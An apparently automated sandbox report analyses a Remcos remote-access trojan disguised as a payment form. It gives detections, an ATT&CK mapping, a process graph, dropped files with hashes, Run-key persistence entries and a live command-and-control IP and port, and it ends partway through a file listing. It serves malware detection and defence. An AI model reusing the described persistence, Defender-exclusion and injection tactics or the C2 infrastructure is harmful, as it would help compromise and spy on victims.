              Source: Yara matchFile source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.1656887776.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1407344012.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.1574639451.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 8156, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 2508, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3248, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 7388, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: cmd.exe9_2_0040567A

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting              		Valid Accounts2
              Native API              		11
              Scripting              		1
              DLL Side-Loading              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		12
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		1
              Access Token Manipulation              		1
              Deobfuscate/Decode Files or Information              		111
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol111
              Input Capture              		2
              Encrypted Channel              		Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts1
              Command and Scripting Interpreter              		1
              Windows Service              		1
              Windows Service              		4
              Obfuscated Files or Information              		2
              Credentials In Files              		1
              System Service Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		122
              Process Injection              		12
              Software Packing              		NTDS3
              File and Directory Discovery              		Distributed Component Object ModelInput Capture1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              Service Execution              		1
              Registry Run Keys / Startup Folder              		1
              Scheduled Task/Job              		1
              DLL Side-Loading              		LSA Secrets33
              System Information Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Registry Run Keys / Startup Folder              		1
              Masquerading              		Cached Domain Credentials121
              Security Software Discovery              		VNCGUI Input Capture12
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
              Virtualization/Sandbox Evasion              		DCSync31
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation              		Proc Filesystem3
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt122
              Process Injection              		/etc/passwd and /etc/shadow1
              Application Window Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Owner/User Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561752 Sample: Payment Transfer Request Fo... Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 98 geoplugin.net 2->98 104 Suricata IDS alerts for network traffic 2->104 106 Found malware configuration 2->106 108 Malicious sample detected (through community Yara rule) 2->108 110 22 other signatures 2->110 12 Payment Transfer Request Form.bat.exe 7 2->12         started        16 remcos.exe 2->16         started        18 remcos.exe 2->18         started        20 2 other processes 2->20 signatures3 process4 file5 86 C:\Users\user\AppData\Roaming\iKgKaogJ.exe, PE32 12->86 dropped 88 C:\Users\...\iKgKaogJ.exe:Zone.Identifier, ASCII 12->88 dropped 90 C:\Users\user\AppData\Local\...\tmp854C.tmp, XML 12->90 dropped 92 Payment Transfer R...st Form.bat.exe.log, ASCII 12->92 dropped 128 Adds a directory exclusion to Windows Defender 12->128 130 Injects a PE file into a foreign processes 12->130 22 Payment Transfer Request Form.bat.exe 5 5 12->22         started        26 powershell.exe 23 12->26         started        28 powershell.exe 23 12->28         started        30 schtasks.exe 1 12->30         started        32 remcos.exe 16->32         started        34 schtasks.exe 16->34         started        36 remcos.exe 18->36         started        38 schtasks.exe 18->38         started        132 Multi AV Scanner detection for dropped file 20->132 134 Machine Learning detection for dropped file 20->134 40 2 other processes 20->40 signatures6 process7 file8 80 C:\ProgramData\AppUpdate\remcos.exe, PE32 22->80 dropped 82 C:\Users\user\AppData\Local\...\install.vbs, data 22->82 dropped 84 C:\ProgramData\...\remcos.exe:Zone.Identifier, ASCII 22->84 dropped 112 Detected Remcos RAT 22->112 42 wscript.exe 1 22->42         started        114 Loading BitLocker PowerShell Module 26->114 45 conhost.exe 26->45         started        47 conhost.exe 28->47         started        49 conhost.exe 30->49         started        51 conhost.exe 34->51         started        53 conhost.exe 38->53         started        55 conhost.exe 40->55         started        signatures9 process10 signatures11 116 Windows Scripting host queries suspicious COM object (likely to drop second stage) 42->116 118 Suspicious execution chain found 42->118 57 cmd.exe 42->57         started        process12 process13 59 remcos.exe 57->59         started        62 conhost.exe 57->62         started        signatures14 120 Multi AV Scanner detection for dropped file 59->120 122 Machine Learning detection for dropped file 59->122 124 Adds a directory exclusion to Windows Defender 59->124 126 Injects a PE file into a foreign processes 59->126 64 remcos.exe 59->64         started        68 powershell.exe 59->68         started        70 powershell.exe 59->70         started        72 schtasks.exe 59->72         started        process15 dnsIp16 94 212.162.149.226, 49754, 9285 UNREAL-SERVERSUS Netherlands 64->94 96 geoplugin.net 178.237.33.50, 49761, 80 ATOM86-ASATOM86NL Netherlands 64->96 100 Detected Remcos RAT 64->100 102 Loading BitLocker PowerShell Module 68->102 74 conhost.exe 68->74         started        76 conhost.exe 70->76         started        78 conhost.exe 72->78         started        signatures17 process18

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Payment Transfer Request Form.bat.exe53%ReversingLabsByteCode-MSIL.Trojan.Remcos
              Payment Transfer Request Form.bat.exe61%VirustotalBrowse
              Payment Transfer Request Form.bat.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\install.vbs100%AviraVBS/Runner.VPD
              C:\ProgramData\AppUpdate\remcos.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\iKgKaogJ.exe100%Joe Sandbox ML
              C:\ProgramData\AppUpdate\remcos.exe53%ReversingLabsByteCode-MSIL.Trojan.Remcos
              C:\ProgramData\AppUpdate\remcos.exe61%VirustotalBrowse
              C:\Users\user\AppData\Roaming\iKgKaogJ.exe53%ReversingLabsByteCode-MSIL.Trojan.Remcos

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              149.2260%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              		178.237.33.50
              		truefalse
                		high
                s-part-0035.t-0009.t-msedge.net
                		13.107.246.63
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpfalse
                    		high
                    149.226true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/ivremcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://tempuri.org/ianiDataSet1.xsdPayment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drfalse
                        		high
                        http://geoplugin.net/PUremcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://geoplugin.net/json.gp/CPayment Transfer Request Form.bat.exe, 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, Payment Transfer Request Form.bat.exe, 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            http://tempuri.org/ianiDataSet2.xsdMPayment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drfalse
                              		high
                              http://geoplugin.net/json.gpalremcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePayment Transfer Request Form.bat.exe, 00000000.00000002.1414846976.000000000282C000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 0000000F.00000002.1535563914.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 00000018.00000002.1598556738.000000000319F000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 0000001D.00000002.1679679015.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 00000021.00000002.1760390363.00000000030DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.chiark.greenend.org.uk/~sgtatham/putty/0Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drfalse
                                    		high
                                    http://geoplugin.net/json.gpSystem32remcos.exe, 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://geoplugin.net/_IDENTIFIER=Intel64remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/ianiDataSet.xsdPayment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          178.237.33.50
                                          		geoplugin.netNetherlands
                                          		8455ATOM86-ASATOM86NLfalse
                                          212.162.149.226
                                          		unknownNetherlands
                                          		64236UNREAL-SERVERSUStrue

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1561752
                                          Start date and time:2024-11-24 08:22:40 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 11m 3s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:40
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Payment Transfer Request Form.bat.exe
                                          Detection:MAL
                                          Classification:mal100.rans.troj.spyw.expl.evad.winEXE@49/31@2/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 99%
                                          • Number of executed functions: 180
                                          • Number of non-executed functions: 190
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          02:23:29API Interceptor2x Sleep call for process: Payment Transfer Request Form.bat.exe modified
                                          02:23:36API Interceptor73x Sleep call for process: powershell.exe modified
                                          02:23:40API Interceptor2x Sleep call for process: iKgKaogJ.exe modified
                                          02:23:40API Interceptor4016671x Sleep call for process: remcos.exe modified
                                          07:23:37Task SchedulerRun new task: iKgKaogJ path: C:\Users\user\AppData\Roaming\iKgKaogJ.exe
                                          07:23:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AppUpdate "C:\ProgramData\AppUpdate\remcos.exe"
                                          07:23:48AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AppUpdate "C:\ProgramData\AppUpdate\remcos.exe"
                                          07:23:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AppUpdate "C:\ProgramData\AppUpdate\remcos.exe"

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          178.237.33.50CargoInvoice_Outstanding_56789_2024-11-21.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                          • geoplugin.net/json.gp
                                          payment receipt copy.bat.exeGet hashmaliciousRemcosBrowse
                                          • geoplugin.net/json.gp
                                          1732341066786265aade6e9541774ff20509504237780da7874a65dc23bf44c6634c553abe427.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                          • geoplugin.net/json.gp
                                          17323410671691fb610332a2a23e84df9d573b6d7d338d6835a49e8e0241717de8180586cb855.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                          • geoplugin.net/json.gp
                                          17323144242c7236b99d23fa10a9292bd7fb1c1fb47a26f3a8dc1daae9ecf25bbc7e35eb77810.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                          • geoplugin.net/json.gp
                                          018292540-LetterReguranPPI-20230814215304.PDF.exeGet hashmaliciousRemcosBrowse
                                          • geoplugin.net/json.gp
                                          800399031-18.11.2024.pdf.exeGet hashmaliciousRemcosBrowse
                                          • geoplugin.net/json.gp
                                          Purchase Inquiry_002.exeGet hashmaliciousRemcosBrowse
                                          • geoplugin.net/json.gp
                                          APPENDIX FORM_N#U00b045013-20241120.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • geoplugin.net/json.gp
                                          wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                          • geoplugin.net/json.gp
                                          212.162.149.226Invoice.GT872905.pdf.exeGet hashmaliciousRemcosBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            s-part-0035.t-0009.t-msedge.netMarine Energy Sdn Bhd Request for Quotation.exeGet hashmaliciousFormBookBrowse
                                            • 13.107.246.63
                                            purchase Order.exeGet hashmaliciousFormBookBrowse
                                            • 13.107.246.63
                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                            • 13.107.246.63
                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                            • 13.107.246.63
                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                            • 13.107.246.63
                                            4yOuoT4GFy.exeGet hashmaliciousAsyncRATBrowse
                                            • 13.107.246.63
                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                            • 13.107.246.63
                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                            • 13.107.246.63
                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                            • 13.107.246.63
                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                            • 13.107.246.63
                                            geoplugin.netCargoInvoice_Outstanding_56789_2024-11-21.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 178.237.33.50
                                            payment receipt copy.bat.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            1732341066786265aade6e9541774ff20509504237780da7874a65dc23bf44c6634c553abe427.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            17323410671691fb610332a2a23e84df9d573b6d7d338d6835a49e8e0241717de8180586cb855.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            17323144242c7236b99d23fa10a9292bd7fb1c1fb47a26f3a8dc1daae9ecf25bbc7e35eb77810.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            018292540-LetterReguranPPI-20230814215304.PDF.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            800399031-18.11.2024.pdf.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            Purchase Inquiry_002.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            APPENDIX FORM_N#U00b045013-20241120.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 178.237.33.50
                                            wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                            • 178.237.33.50

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            UNREAL-SERVERSUSPago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                            • 162.251.122.76
                                            PO - HTS - 0893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 212.162.149.35
                                            PO - HTS - 0893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 212.162.149.35
                                            PO 331385674200010.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 212.162.149.35
                                            Vodka.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 212.162.149.35
                                            O0rhQM49FL.exeGet hashmaliciousGuLoaderBrowse
                                            • 212.162.151.158
                                            cIs9D0juC8.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 212.162.149.7
                                            Intesa.Sanpaolo.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                                            • 204.10.160.239
                                            RFQ-24064562-SUPPLY-NOv-ORDER.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 185.149.234.209
                                            7ZpqVr5abI.exeGet hashmaliciousGuLoaderBrowse
                                            • 162.251.122.91
                                            ATOM86-ASATOM86NLCargoInvoice_Outstanding_56789_2024-11-21.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 178.237.33.50
                                            payment receipt copy.bat.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            1732341066786265aade6e9541774ff20509504237780da7874a65dc23bf44c6634c553abe427.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            17323410671691fb610332a2a23e84df9d573b6d7d338d6835a49e8e0241717de8180586cb855.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            17323144242c7236b99d23fa10a9292bd7fb1c1fb47a26f3a8dc1daae9ecf25bbc7e35eb77810.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            018292540-LetterReguranPPI-20230814215304.PDF.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            800399031-18.11.2024.pdf.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            Purchase Inquiry_002.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            APPENDIX FORM_N#U00b045013-20241120.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 178.237.33.50
                                            wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                            • 178.237.33.50

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\AppUpdate\remcos.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):1243656
                                            Entropy (8bit):7.6645164763774805
                                            Encrypted:false
                                            SSDEEP:24576:RYdgfvzAKzxWCC9vSA6GRdsttHVqowvVpBdlvlOUa:rzAcWFt96ydyQow5dldna
                                            MD5:FC5A80ADF45D78FFA834283D0A78F9F6
                                            SHA1:6865DEC6F71546EA01420295B7175038C3A81EC4
                                            SHA-256:E588A098E9CEB33F2616E11A3FAF28162E5F4B7F3800B22AB3023BC376AEB18C
                                            SHA-512:27636CD0D31E3B1FF384869F1F2BE6C23D7F02ECD70027C5D689DE0893835D070218596A941472481D637CC6253ED3F2405991A6AF4772596CC88F909A7DD7CB
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 53%
                                            • Antivirus: Virustotal, Detection: 61%, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>g..............0......(.......... ........@.. ....................... ............@.....................................O........%...............6........................................................... ............... ..H............text....... ...................... ..`.rsrc....%.......&..................@..@.reloc..............................@..B.......................H............3..........tJ.. n............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"

                                            C:\ProgramData\AppUpdate\remcos.exe:Zone.Identifier

                                            Download File
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Preview:[ZoneTransfer]....ZoneId=0

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Transfer Request Form.bat.exe.log

                                            Download File
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:true
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iKgKaogJ.exe.log

                                            Download File
                                            Process:C:\Users\user\AppData\Roaming\iKgKaogJ.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\remcos.exe.log

                                            Download File
                                            Process:C:\ProgramData\AppUpdate\remcos.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
